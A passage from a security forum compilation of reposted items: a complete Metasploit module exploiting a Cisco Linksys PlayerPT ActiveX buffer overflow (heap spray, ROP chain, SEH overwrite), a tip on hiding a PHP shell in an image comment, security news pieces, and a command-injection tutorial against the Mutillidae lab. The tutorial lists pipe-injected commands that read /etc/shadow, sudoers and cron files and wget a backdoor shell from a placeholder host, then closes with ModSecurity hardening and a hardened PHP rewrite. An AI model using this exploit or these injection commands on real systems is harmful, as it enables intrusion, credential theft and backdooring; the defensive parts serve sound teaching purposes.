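The pbcontrol check decodes the query before looking for metacharacters, because the module URL-encodes the quotes and semicolons; matching on the raw request line would miss them. The CuteFlow upload itself travels in a POST body that access logs do not record, which is why the rule keys on the upload endpoint and on the follow-up GET of a .php file from upload/___1/, a directory that should never serve executable content.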
  11. Cisco Linksys PlayerPT ActiveX Control Buffer Overflow

     EDB-ID: 20112 | CVE: 2012-0284 | OSVDB-ID: 80297
     Author: metasploit | Published: 2012-07-27 | Verified:
     Exploit Code: | Vulnerable App: N/A

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::Seh
	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:ua_name    => HttpClients::IE,
		:ua_minver  => "6.0",
		:ua_maxver  => "8.0",
		:javascript => true,
		:os_name    => OperatingSystems::WINDOWS,
		:classid    => "{9E065E4A-BD9D-4547-8F90-985DC62A5591}",
		:method     => "SetSource",
		:rank       => NormalRanking
	})

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Cisco Linksys PlayerPT ActiveX Control Buffer Overflow',
			'Description'    => %q{
					This module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15 as the
				installed with the web interface of Cisco Linksys WVC200 Wireless-G PTZ Internet Video
				Camera. The vulnerability, due to the insecure usage of sprintf in the SetSource method,
				allows to trigger a stack based buffer overflow which leads to code execution under the
				context of the user visiting a malicious web page.
			},
			'Author'         =>
				[
					'Carsten Eiram', # Vulnerability Discovery
					'rgod',          # PoC
					'juan vazquez'   # Metasploit module
				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'OSVDB', '80297' ],
					[ 'CVE', '2012-0284' ],
					[ 'BID', '54588' ],
					[ 'EDB', '18641' ],
					[ 'URL', 'http://secunia.com/secunia_research/2012-25/' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'          => 1024,
					'DisableNops'    => true,
					'BadChars'       => "\x00\x0d\x0a\x5c",
					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
				},
			'DefaultOptions' =>
				{
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Cisco Linksys PlayerPT ActiveX Control 1.0.0.15
					[ 'Automatic', { } ],
					[ 'IE 6 on Windows XP SP3',
						{
							'Spray'             => true,
							'SprayBlocks'       => 0x185,
							'SprayOffset'       => '0x0',
							'OffsetStackBottom' => 8556
						}
					],
					[ 'IE 7 on Windows XP SP3 / Windows Vista SP2',
						{
							'Spray'             => true,
							'SprayBlocks'       => 0x185,
							'SprayOffset'       => '0x0',
							'OffsetStackBottom' => 3220
						}
					],
					[ 'IE 8 on Windows XP SP3',
						{
							'Spray'             => false,
							'OffsetRop'         => 160,
							'Offset'            => 456,
							'Ret'               => 0x1002c536, # ADD ESP,0A2C # RETN from PlayerPT.ocx
							'OffsetStackBottom' => 4108
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Mar 22 2012',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
			], self.class
		)
	end

	def get_spray(t, js_code, js_nops)
		spray = <<-JS
		var heap_obj = new heapLib.ie(0x20000);
		var code = unescape("#{js_code}");
		var nops = unescape("#{js_nops}");

		while (nops.length < 0x80000) nops += nops;

		var offset = nops.substring(0, #{t['SprayOffset']});
		var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

		while (shellcode.length < 0x40000) shellcode += shellcode;
		var block = shellcode.substring(0, (0x80000-6)/2);

		heap_obj.gc();
		for (var z=1; z < #{t['SprayBlocks']}; z++) {
			heap_obj.alloc(block);
		}
		JS

		return spray
	end

	# rop chain generated with mona.py
	def create_rop_chain()
		rop_gadgets = [
			0x77c2f271, # POP EBP # RETN [msvcrt.dll]
			0x77c2f271, # skip 4 bytes [msvcrt.dll]
			0x77c5335d, # POP EBX # RETN [msvcrt.dll]
			0xffffffff, #
			0x77c127e1, # INC EBX # RETN [msvcrt.dll]
			0x77c127e1, # INC EBX # RETN [msvcrt.dll]
			0x77c4e392, # POP EAX # RETN [msvcrt.dll]
			0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
			0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
			0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
			0x77c34de1, # POP EAX # RETN [msvcrt.dll]
			0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
			0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
			0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
			0x77c479e2, # POP EDI # RETN [msvcrt.dll]
			0x77c39f92, # RETN (ROP NOP) [msvcrt.dll]
			0x77c3b8ba, # POP ESI # RETN [msvcrt.dll]
			0x77c2aacc, # JMP [EAX] [msvcrt.dll]
			0x77c4e392, # POP EAX # RETN [msvcrt.dll]
			0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
			0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
			0x77c51025, # ptr to 'push esp # ret ' [msvcrt.dll]
		].pack("V*")

		return rop_gadgets
	end

	def get_payload(my_target)
		case my_target.name
		when /IE 6 on Windows XP SP3/
			my_payload = "\x0c" * my_target['OffsetStackBottom']
			return my_payload
		when /IE 7 on Windows XP SP3 \/ Windows Vista SP2/
			my_payload = "\x0c" * my_target['OffsetStackBottom']
			return my_payload
		when /IE 8 on Windows XP SP3/
			my_payload = rand_text_alpha(my_target['OffsetRop'])
			my_payload << create_rop_chain
			my_payload << make_nops(my_target['Offset'] - my_payload.length)
			my_payload << generate_seh_record(my_target.ret)
			my_payload << payload.encoded
			my_payload << rand_text_alpha(my_target['OffsetStackBottom'] - my_payload.length)
			return my_payload
		end
	end

	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'

		if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
			return targets[1] #IE 6 on Windows XP SP3
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
			return targets[2] #IE 7 on Windows XP SP3
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
			return targets[3] #IE 8 on Windows XP SP3
		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
			return targets[2] #IE 7 on Windows Vista SP2
		else
			return nil
		end
	end

	def on_request_uri(cli, request)
		agent = request.headers['User-Agent']
		print_status("User-agent: #{agent}")

		my_target = get_target(agent)
		# Avoid the attack if the victim doesn't have a setup we're targeting
		if my_target.nil?
			print_error("Browser not supported: #{agent}")
			send_not_found(cli)
			return
		end

		js = ""
		if my_target['Spray']
			p = payload.encoded
			js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
			js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
			js = get_spray(my_target, js_code, js_nops)
			js = heaplib(js, {:noobfu => true})

			if datastore['OBFUSCATE']
				js = ::Rex::Exploitation::JSObfu.new(js)
				js.obfuscate
			end
		end

		sploit = get_payload(my_target)
		sploit = sploit.gsub(/"/, "\\\"")

		html = <<-MYHTML
		<html>
		<head>
		<script>
		#{js}
		</script>
		</head>
		<body>
		<object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' /></object>
		<script>
		obj.SetSource("","","","","#{sploit}");
		</script>
		</body>
		</html>
		MYHTML

		html = html.gsub(/^\t\t/, '')

		print_status("Sending html")
		send_response(cli, html, {'Content-Type'=>'text/html'})
	end

end
  12. The PHP code (the shell) is inserted into the image's comment field, because if that PHP code were inserted directly into the image, the header would be corrupted, which would make the upload fail. Putting the code in the image's comment makes the PHP interpreter see that PHP executable.
  13. Dynamic Analysis of PDF Shellcode Description: In this video you will learn how to dynamically analyse malware, namely the shellcode extracted from a targeted PDF attack. The shellcode has been compiled into a functional PE binary so that we can readily examine its behavior. SpiderLabs Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Dynamic Analysis of PDF Shellcode on Vimeo
  14. Debugging PDF Shellcode Description: In this video you will learn how to debug shellcode extracted from a targeted PDF attack for reverse engineering; he is using the OllyDbg software. The shellcode has been compiled into a functional PE binary. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Debugging PDF Shellcode on Vimeo
  15. Description: Fast and tiny CMS WordPress Security scanner to find vulnerable plugins installed and to give related exploit details. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source:
  16. Description: This and more videos in: Blog de Omar You can download the software Stake LC5 and the rainbow tables in: Blog de Omar and El Palomo | Facebook Follow me: @ELPalomo_Blog The video shows the following procedures:

    How Windows saves the passwords: LM hash / NTLM hash
    How to get the password via PWDUMP
    How the Rainbow Tables work
    Cracking the password with Stake LC5 via Rainbow Tables

    Spanish version: Cracking Password Windows Con Rainbow Tables - Español Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source:
  17. As attacks keep improving, we need to improve our protection methods too. Helping us improve is Ambush HIPS, a new and dramatically more flexible host intrusion prevention system able to act on virtually any behavior. Ambush is an open source, behavior-based host intrusion prevention system (HIPS) that monitors virtually everything a process does on a Windows operating system. It can monitor those functions; it can see how malware acts no matter what it does, and it can tell when your processes do things differently from normal programs, even if the result is the same. The Ambush HIPS works in a client-server architecture. The client has to be run on a Windows machine (32-bit and 64-bit) and the server can be run on a *NIX system, which uses a bitnami rubystack appliance, which can also be run on a Windows machine with the VM Player. On *NIX machines it would need Ruby 1.9 or JRuby-1.6.5.1 along with openssl. Ambush works with the following understanding: to see your files, execute commands, maintain control of your system, hide, steal information, or do anything else, attackers' code needs to call Windows functions. So to avoid your antivirus or intrusion detection systems, attackers change the packing or obfuscation to change how the malware looks, but it calls the same functions to do the same things. Ambush can monitor those functions; it can see how malware acts no matter what it does, and it can tell when your processes do things differently from normal programs, even if the result is the same. Ambush HIPS also forwards alerts to an alert aggregator/event correlator, like Splunk or Arcsight. Since this project is currently under development and testing, a lot of features will be added/fixed. It needs your help with all of that! Please do submit your bug reports/feature additions to the Ambush Bugtracker located here. Download Ambush HIPS here. Sursa: PenTestIT — Your source for Information Security Related information!
  18. Wubi

    Anti-virus

    ESET Smart Security 6. It is not quite "all there" sometimes, but it does its job excellently while using few resources. Now, opinions are divided, as has always been the case with AV solutions. Everyone has their own favourite when it comes to anti-virus.
  19. Malware attack targets German internet users | Naked Security by Graham Cluley on July 26, 2012 Do you remember the spammed-out malware attack which appeared to be targeting French speakers last week with its offer of très sexy photos from a Gallic admirer? Well, now it seems that German internet users are in the targets of cybercriminals. A malware campaign has been sent out, seemingly just to email addresses ending in ".de", claiming that photos of the recipient can be found in the attached file. Those with a curious disposition might find it hard to resist clicking on the attachment to find out more. Here is just a small selection of the examples we have intercepted in our spam traps: You'll notice that the emails have forged "from:" addresses. Presumably the masterminds of the malware campaign are hoping that some users might be more likely to open emails that pretend to come from LinkedIn... or Habbo Hotel. Attached to each of the emails is a file, called DCIM.htm, which is detected by Sophos products as Troj/Redir-P. The file (which users are encouraged by the email to open using Internet Explorer) attempts to contact a Russian website known to contain malware. Remember to always be suspicious of unsolicited messages, even if they arrive in your native language. Sursa: Malware attack targets German internet users | Naked Security
  20. Black Hat – SexyDefense, maximizing the home-field advantage | Naked Security by Irene Michlin on July 26, 2012 I'm attending Black Hat this year, and one of the most interesting and controversial talks so far was "SexyDefense - Maximizing the home-field advantage" by Iftach Ian Amit. Ian opened with some very good advice about the defensive mindset: there is no final, optimal, best-practice security strategy. It's: a) always evolving; b) specific to your organisation. Security compliance testing by itself does not improve organisational security. It's what the organisation does after the compliance test or penetration test that matters. The theme of the conference as a whole this year seems to be that the concept of a "perimeter defense" is dead. There will always be gaps and breaches. We need to concentrate on detecting them as soon as possible and responding the best way possible. Our focus should be on finding the next gap in security instead of looking for someone to blame for the previous gap. Another useful piece of advice is to log everything everywhere, and filter later. Storage is cheap; missing an early sign of attack is expensive. Some early warnings will be well outside any IDS system, like the volume of calls to support, unusual sales enquiries or odd PC behavior reported by your staff. Ian, similarly to keynote speaker Shawn Henry (ex-FBI), draws analogies between real-world defense and cyber-defense, and suggests taking the fight to the bad guys' territory. One example was taking the DarkComet tool, infecting it with itself, and uploading it back to a popular "toolz" website. Everyone who downloaded that version of the tool was 0wned. Another example was modifying a dodgy packer to leave a distinct signature. The only caveat was: get legal advice appropriate to your country before attempting that at home. I have many more issues with this.
I've tried to discuss them with Ian after the talk, but his approach is "we work in a tainted space, it's naive to think we can do that wearing white gloves". But let's consider the classic principle of anti-virus companies: "Don't modify malware, to do that is as bad as creating your own new malware". Is it really naive? We follow this principle even internally, never mind uploading this modified malware anywhere else. Before we consider moral issues, let's consider the usefulness of this approach. Why would someone download a new version of your malware? I'd have thought that you would need to provide some useful new functionality. Ian reassures me that's not the case. Most bad guys would just grab the latest version even if there isn't anything new in it. This doesn't eliminate the really clever adversaries. They build their own tools or are not willing to trust random code. Yet we can get the script kiddies while still wearing white gloves. So, you've got some percentage of low-skill hackers who will use your modified tools. You're safe from these attacks. What about all the other attacks?

    1. High-skill hackers who will use other tools against you
    2. Low-skill hackers who get their tools elsewhere

If you play that game, how long before you actually write some new attack capabilities into your malware tools, to increase their adoption or to raise your street cred in the group you are infiltrating? This slope is much more slippery than a simple "don't modify even one byte of malware" rule. All of the above assumes that the modification went to plan, and you've done exactly what you wanted to do to this malware. As a developer, I can tell you it's not a good assumption to make with any piece of software, and I don't see why malware would be different. Do you really want a new virus in the wild on your conscience? Even if your tools can detect it, what about everybody else's tools? So now we are back to the moral side of the story.
Going back to our comparison to the physical world, this talk seems to suggest we make some guns with a known ballistic signature and give them to criminals. In the words of multiple James Bond villains: what could possibly go wrong? Sursa: Black Hat – SexyDefense, maximizing the home-field advantage | Naked Security
  21. July 26, 2012 By Black EDMS Electronic Data Masking Standard Edition, a high performance data masking solution for PCI/PII compliance. Through a free download users are able to mask up to 10 columns of sensitive data across all non-production instances of a single enterprise application. Data masking has emerged as a best practice to protect non-production data because, unlike encryption, masking is able to support the entire application development lifecycle. Data masking removes personally identifiable information such as a person's name and account, credit card, or social security number, and transforms it into contextually accurate data. Download EDMS: EDMS – EDMS Sursa: EDMS is Tool for data masking — PenTestIT
  22. Description: This is an interesting exercise I had given to my students for the SecurityTube Python Scripting Course (SPSE). The problem statement was roughly the following - Create a multi-threaded TCP SYN scanner using the Scapy, Threading and Queue modules in Python. Quick note: 1. This code is to illustrate the use of multithreading in Python 2. Performance of the scanner solely depends on the probe / detection capability of scapy. The code outsources everything to scapy 3. Filtered ports etc. are not taken care of for now. Only SYN-ACKs are considered Code Snippet on Pastebin: [Python] Multi-Threaded SYN Scanner using Scapy, Threading and Queue - Pastebin.com (was a quick cut-paste from the editor - check formatting before running) If you are looking for details on our SPSE course and how to register, please visit this link: SecurityTube Python Scripting Expert | SecurityTube Trainings Enjoy and please do leave your comments behind! Sursa: Simple Multi-Threaded Tcp Syn Scanner Using Scapy, Threading And Queue Modules In Python
  23. Microsoft: Update Java or kill it | ZDNet Summary: Microsoft is offering advice on how to protect yourself from Java-based malware. The instructions are simple: either update it, disable it, or just uninstall it completely. By Emil Protalinski for Zero Day | July 26, 2012 -- 15:06 GMT (08:06 PDT) Microsoft has decided enough is enough: Java-based malware sees no end and it's time to do something about it. The software giant points to two type-confusion vulnerabilities (CVE-2012-0507 and CVE-2012-1723) that have been very actively exploited in recent months. Redmond thus wants you to do one of three things: update Java, disable it, or uninstall it. First, some background. Type-confusion vulnerabilities are effective because they lead to a Sandbox compromise for Java. They occur when the type safety check in the Java Runtime Environment (JRE) fails to verify wrong types supplied to instructions working with different types. If the classes' type safety is broken, you can access some methods that are not supposed to be opened to processes outside of the class. As a result, Microsoft's first recommendation is to update your Java installation. To check the version of JRE your browser is running, head over to java.com/en/download/installed.jsp and get the latest version. I did that in Chrome and IE9. Google's browser informed me that "Java is required to display some elements on this page." Excellent, so I don't have Java installed in Chrome, which I use the most frequently. Next, Microsoft's browser gave me the following error: I know I have Java installed, but I'm guessing this error is happening because it's the 64-bit version. I wasn't surprised Oracle still hasn't fixed Sun's version check code. Next up, Microsoft has offered guidance for those who don't want to keep Java updated.
The software giant points to Apple's instructions for the Mac (support.apple.com/kb/HT5241) and details its own instructions for Windows: If you prefer, you may also just disable your current Java Plug-in temporarily to prevent being vulnerable to Java-based threats. To do this, on Windows systems, go to "Control Panel" and select "Java". When the "Java Runtime Environment Settings" dialog box appears, select the "Java" tab. From there, click the "View" button. You can just uncheck the "Enabled" check box to disable that installation from being used by Java Plug-in and Java Web Start. Even though you can disable Java Plug-in on a per-browser basis, this method is most effective in disabling Java Plug-in system-wide. Last but not least, Microsoft recommended you uninstall Java if you don't use it. Instructions from Oracle are available at java.com/en/download/uninstall.jsp. After seeing Microsoft's warning, I chose to kill Java with fire. I removed it completely from my Windows 7 box. Mind you, I'll probably be doing some programming in a few months, but I'll just reinstall Java then. "So, by following some simple steps, you can protect your machine from this malware infection by choosing to update, disable or uninstall," a Microsoft spokesperson said in a statement. "All of these will be effective for preventing currently prevalent Java based malware; it's just up to you to choose the right method to protect yourself based on your needs and situation." Sursa: Microsoft: Update Java or kill it | ZDNet
  24. Mac malware spies on infected users through video and audio capture | Naked Security by Graham Cluley on July 26, 2012 After further analysis, more information has emerged about the Morcut Mac OS X malware (also known as "Crisis" by some anti-virus products) which was discovered this week. Clearly OSX/Morcut-A was created with spying in mind, as its code includes hooks to control/monitor the following operations:

    mouse coordinates
    instant messengers (for instance, Skype [including call data], Adium and MSN Messenger)
    location
    internal webcam
    clipboard contents
    key presses
    running applications
    web URLs
    screenshots
    internal microphone
    calendar data & alerts
    device information
    address book contents

In short, if this malware managed to infect your Mac computer it could learn an awful lot about you, and potentially steal information which could read your private messages and conversations, and open your email and other online accounts. Fortunately, we haven't seen Morcut in the wild. At the moment the threat is low. However, the complexity of the malware is yet another indication that malware on the Mac is becoming more serious - and designed to make money at your expense. If you haven't already done so, you really should run anti-virus software on your Mac. The software in the Mac App Store is (unfortunately) not up to the job, as it doesn't include the real-time component essential to scan every file (and thus every potential threat) as it is opened. Fortunately, if you are a home user, there is award-winning free anti-virus software for your Mac available. And yes, it works on Mountain Lion too. By the way, if you're curious about where the name "Crisis" came from, it's a name which appears inside the malware's code. As far as we can tell, the author appears to have wanted his malware to be called "Crisis".
However, there is some history and tradition in the computer security industry of not stroking the malware creator's ego and deliberately ignoring their suggestion as to how their Trojan horse or virus should be named. We're delighted not to call the malware "Crisis", but OSX/Morcut instead. Sursa: Mac malware spies on infected users through video and audio capture | Naked Security
  25. Command injection, also known as Remote Code Execution in terms of web exploitation, can be possible when a certain website accepts added strings of characters or arguments; the inputs are used as arguments for executing the command on the website's hosting server, thus making it another common web application vulnerability that allows an attacker to execute arbitrary code on the system. In fact it is included in the OWASP (Open Web Application Security Project) Top Ten Web Application Security Risks. Let us take a look at the image shown above which happens to be our target and example for today. It shows a simple user interface for querying the DNS (Domain Name System) by inserting any Internet Protocol address or host name in the dialog box. Now let us look at the sample vulnerable code for command execution or injection:

<?php
if (isset($_POST["dns-lookup-php-submit-button"])){
    try{
        if ($targethost_validated){
            echo '<p class="report-header">Results for '.$lTargetHostText.'</p>';
            echo '<pre class="report-header" style="text-align:left;">';
            echo shell_exec("nslookup " . $targethost);
            echo '</pre>';
            $LogHandler->writeToLog($conn, "Executed operating system command: nslookup " . $lTargetHostText);
        }else{
            echo '<script>document.getElementById("id-bad-cred-tr").style.display=""</script>';
        }// end if ($targethost_validated){
    }catch(Exception $e){
        echo $CustomErrorHandler->FormatError($e, "Input: " . $targethost);
    }// end try
}// end if (isset($_POST))
?>

I got the code above from the dns-lookup.php file of a free and open source vulnerable web application that I have been playing with, which is Mutillidae from Irongeek.com, developed by Adrian "Irongeek" Crenshaw and Jeremy Druin. Mutillidae is a web application for you to practice your Web Fu skills like sql injection, cross site scripting, html injection, javascript injection, clickjacking, local file inclusion, authentication bypass methods, remote code execution and many more.
It is packed with vulnerable pages, hints and walk-throughs in case you don't have an idea of how the exploit is done. I decided to use this web application so that you could also try out this tutorial or writeup. Okay, now let's try to query a random IP address, which is 74.125.31.102. Did you guys notice that there is an echo shell_exec() function call in the script? If you look closely at the code, you should be able to see shell_exec("nslookup " . $targethost); in it. With the nslookup command, a user can look up an IP address of a domain or host on a network. Linux uses "&&" to link commands and ";" as a command separator. Now, let's try the command echo, but I prefer using the | (vertical bar) instead of && to check if it is vulnerable to command injection:

| echo 'hello'

In this case the target is vulnerable to command injection or execution. It's just like issuing the command nslookup | echo 'hello' in the terminal. But what's the reason why I prefer using the pipeline or vertical bar rather than '&&'? Well, this image should enlighten you: The vertical bar tells the shell to provide the output of the command on the right; this is called a pipeline, while the '&&' links the commands nslookup and uname -a, which output the DNS of the IP address and the kernel version of the host. In some cases, && just doesn't work and sometimes you need to put a value before the pipeline, just like: 1 | echo 'Infosec Institute'. But so much for that, let's continue gathering some information on the webserver. And because we used the command uname -a, we were able to identify information on the system, like that it runs on Linux kernel release 3.0.0-16, the network node hostname is projectX, the operating system is GNU/Linux, etc.
Now let's probe or check what Linux distribution this server is:

| cat /etc/issue
| cat /etc/*-release
| cat /etc/lsb-release
| cat /etc/redhat-release (for rpm-based distros)

Hey, it's BackBox Linux, which is one of my favorite penetration testing distros based on Ubuntu. Time to figure out where we are now and list all the directories:

| pwd ; ls -la

As an information gatherer, it is our task to check what services are running and which service belongs to a specific user privilege:

| ps aux
| ps -ef
| top
| cat /etc/service

Attackers may also check if there are any settings that are mis-configured or some logs to check if anything can be exploited or if there are vulnerable plugins attached. Below are other commands for specific directories that are used in probing the web server:

| cat /etc/environment
| cat /proc/self/environ
| cat /etc/shadow
| cat /etc/sudoers
| cat /etc/group
| cat /etc/security/group
| cat /etc/security/passwd
| cat /etc/security/user
| cat /etc/security/environ
| cat /etc/security/limits
| cat /usr/lib/security/mkuser.default
| cat /var/log/messages
| cat /var/log/mysql.log
| cat /var/log/user.log
| cat /var/www/logs/error_log
| cat /etc/syslog.conf
| cat /etc/chttp.conf
| cat /etc/lighttpd.conf
| cat /etc/cups/cupsd.conf
| cat /etc/inetd.conf
| cat /etc/apache2/apache2.conf
| cat /var/log/apache2/error.log
| cat /etc/my.conf
| cat /etc/httpd/conf/httpd.conf
| cat /opt/lampp/etc/httpd.conf
| ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
| cat /etc/resolv.conf
| cat /etc/sysconfig/network
| cat /etc/networks
| /sbin/ifconfig -a
| cat /etc/network/interfaces
| ls -alh /var/spool/cron
| ls -al /etc/ | grep cron
| ls -al /etc/cron*
| cat /etc/cron*
| cat /etc/at.allow
| cat /etc/at.deny
| cat /etc/cron.allow
| cat /etc/cron.deny
| cat /etc/crontab
| cat /etc/anacrontab
| cat /var/spool/cron/crontabs/root

With most attackers interested in backdooring a Linux webserver, they need to probe first and try to see how files can be uploaded so that they can deliver the finishing touch.

| find / -name wget
| find / -name nc*
| find / -name netcat*
| find / -name tftp*
| find / -name ftp

I think I'll try wget then, so I just need to try and download a text file from a certain URL I found in Google Search Engine.

| wget http://whateversite.com/hackers/resources/digital%20rebels/articles/unixhck.txt

The wget command allows non-interactive download of files from the Web and it supports the HTTP, HTTPS, and FTP protocols. Let's try to check if the file is really uploaded by typing these commands:

| ls -la
| cat unixhck.txt

Great, now I have downloaded a text file of Sir Hackalot's tutorial about Unix Hacking to the web server. Now let's try to upload a backdoor shell in a text file. In this example I will be using an r57 Backdoor Shell from another source.

| wget http://whateversite.com/backdoor.txt

Now let's make a php backdoor shell by copying the contents of backdoor.txt to newfilename.php (I'll just make a new backdoor.php file).

| cp backdoor.txt backdoor.php

Now time to check the backdoor shell. Most backdoor shells have the shell_exec() function too; that's why you can execute commands on them more easily. Because it allows command execution, attackers may also use it for running their malicious scripts like IRC bots, scanners, mass ssh scanners, bruteforcers, etc. For example:

perl udp.pl ./a 124.104
perl wetwork.pl
perl timthumbexploiter.pl
python bot.py

Tips for Preventing Remote Code Execution: Disable the shell_exec() function if you do not plan to use it, to prevent arbitrary code execution, or if you just want to get rid of this security risk. But if you really need the shell_exec() function for a certain php file or form, then use the escapeshellarg() function, which escapes shell metacharacters, and the escapeshellcmd() function, which is used to escape single arguments to shell functions coming from user input.
Both of these functions escape potentially dangerous characters in the string. Adding a WAF or web application firewall could also help, although I cannot guarantee 100 percent security since some WAFs can still be bypassed, but at least there are some preventions. It also depends on the lockdown. But I prefer using ModSecurity for hardening your Apache Web Server in Linux/Unix because it is an open source web application firewall which helps you to detect and prevent common attacks against web applications like SQL Injection, XSS, Command Injection or Execution, etc. And so I decided to share a simple guide for installing ModSecurity just in case you wanna try it out.

Setting up ModSecurity in your Web Server running Ubuntu and Debian Based Distros:

Type this in your terminal emulator:

sudo apt-get install libapache2-modsecurity

This should install new packages for libapache2-modsecurity and modsecurity-crs. Create a directory for ModSecurity in the Apache2 folder:

sudo mkdir /etc/apache2/modsecurity

Create a configuration file for ModSecurity, which will be loaded by Apache, using this command:

sudo nano /etc/apache2/conf.d/modsecurity.conf

Add the following code, save and exit (Ctrl+X, type Y to agree to the changes to the file, then press Enter to save):

## /etc/apache2/conf.d/modsecurity.conf
Include modsecurity/*.conf

Set the ModSecurity rules using these two commands:

cd /etc/apache2/modsecurity
sudo cp -R /usr/share/modsecurity-crs/base_rules/* .

Modify and correct the line in the modsecurity_crs_20_protocol_violations.conf file:

sudo nano /etc/apache2/modsecurity/modsecurity_crs_20_protocol_violations.conf

Replace this line:

SecRule REQBODY_ERROR "!@eq 0"

with this one:

SecRule REQBODY_PROCESSOR_ERROR "!@eq 0"

Then save and exit. Now restart the Apache web server:

sudo service apache2 restart

To verify that the ModSecurity module is loaded in Apache, type this command:

cat /var/log/apache2/error.log | grep modsecurity

The output should look like this if configured properly:

ModSecurity for Apache/2.6.0 (URL) configured.

Additional Reading Materials: Php Endangers - Remote Code Execution Sursa: InfoSec Resources – Command Execution
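As an added example (not Mutillidae's code and not part of the InfoSec Institute writeup above), here is a hardened rewrite of the dns-lookup logic: the target is validated as an IP address or RFC 1123 hostname before it ever reaches the shell, escapeshellarg() is applied as a second layer, and the resolver output is HTML-encoded before being echoed. Function names and the sample inputs are my own.

```php
<?php
// Added example: hardened replacement for the vulnerable
// echo shell_exec("nslookup " . $targethost) shown above.
// Not Mutillidae's code; function names are hypothetical.

// Layer 1: accept only an IP literal or an RFC 1123 hostname, so the
// shell never sees the '|', '&&' or ';' used in the injection strings.
function is_valid_lookup_target(string $target): bool
{
    if (filter_var($target, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    if (strlen($target) > 253) {
        return false;
    }
    // Dot-separated labels of letters, digits and hyphens (1-63 chars each),
    // no label starting or ending with a hyphen, optional trailing dot.
    $label = '(?!-)[A-Za-z0-9-]{1,63}(?<!-)';
    return preg_match('/^' . $label . '(\.' . $label . ')*\.?$/', $target) === 1;
}

// Layer 2: even a validated value is wrapped by escapeshellarg(), which
// single-quotes it and escapes any embedded single quote.
function build_nslookup_command(string $target): ?string
{
    if (!is_valid_lookup_target($target)) {
        return null; // refuse; do not try to "clean up" an invalid target
    }
    return 'nslookup ' . escapeshellarg($target);
}

// Drop-in replacement for the vulnerable branch of dns-lookup.php.
function run_dns_lookup(string $target): string
{
    $cmd = build_nslookup_command($target);
    if ($cmd === null) {
        return 'Rejected: not an IP address or hostname.';
    }
    $output = shell_exec($cmd);
    // Layer 3: encode before echoing so resolver output cannot inject markup.
    return '<pre>' . htmlspecialchars($output ?? '', ENT_QUOTES, 'UTF-8') . '</pre>';
}

// Constructed inputs: legitimate targets beside the injection strings from
// the writeup. Only the command string is built here; nothing is executed.
$samples = [
    '74.125.31.102',
    'example.com',
    "| echo 'hello'",
    "1 | echo 'Infosec Institute'",
    '74.125.31.102 && uname -a',
    '-badlabel.example',
];
foreach ($samples as $s) {
    $cmd = build_nslookup_command($s);
    printf("%-30s -> %s\n", $s, $cmd ?? 'REJECTED');
}
```

Only the first two samples produce a command, and each arrives at the shell wrapped in single quotes; everything containing a pipe, an ampersand, a space or a leading hyphen is refused before escapeshellarg() is even reached.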